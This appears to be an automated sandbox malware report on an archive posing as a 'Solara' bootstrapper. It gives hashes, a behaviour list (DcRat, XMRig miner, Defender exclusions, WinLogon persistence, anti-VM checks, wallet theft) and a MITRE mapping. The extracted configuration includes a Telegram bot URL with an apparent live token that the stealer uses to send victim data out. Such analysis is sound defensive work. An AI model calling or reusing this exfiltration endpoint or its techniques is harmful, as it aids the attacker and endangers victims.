General
-
Target
SolaraBootsrapper.rar
-
Size
6.1MB
-
Sample
240717-qefwmavfpf
-
MD5
706df4069dacbd0cd0d80c5319431eec
-
SHA1
e582f777cc585cdbc45c1eeafcef2307727c1f17
-
SHA256
53d6112deaab099a9da782ba5fe8ccf729b2b1328bb0a62afdc9f09f9cd427c6
-
SHA512
e74da6eff06a8627dec2fc0f5619cbfe55d4244167679951c905367f8625f5da7638d29b34cdc7d524d02d5f8b6d1acdda407eb679638d75a87d6abea2ad4f78
-
SSDEEP
196608:76l2VFjUSLzLnFdH1ysmVYEaqr7xzFPST7x91G/5rF:7RUSLzDFdHAJV/RHtN0x9WF
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendPhoto?chat_id=7391062786&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%204f1ca97b69752bcaadf13b0dd4a54c66c43cb077%0A%E2%80%A2%20Comment%3A%20br0ken%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20ELEOLWUJ%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%5CInternet%20Explorer%5CRegistry.ex
Targets
-
-
Target
Youtube.exe
-
Size
8.7MB
-
MD5
d25ebdfc04bdadea74017fa72f90781f
-
SHA1
f7278c4d04fc4db888368e0245d7607d8bcbb557
-
SHA256
9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f
-
SHA512
77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71
-
SSDEEP
196608:fE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5m:fE9B0OjrdLK4J/Y
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies WinLogon for persistence
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM)
-
XMRig Miner payload
-
Command and Scripting Interpreter: PowerShell
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
.NET Reactor proctector
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
-
Checks BIOS information in registry
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE
-
Loads dropped DLL
-
Accesses cryptocurrency files/wallets, possible credential harvesting
-
Adds Run key to start application
-
Blocklisted process makes network request
-
Checks installed software on the system
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory
-
Suspicious use of NtSetInformationThreadHideFromDebugger
-
Suspicious use of SetThreadContext
-
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1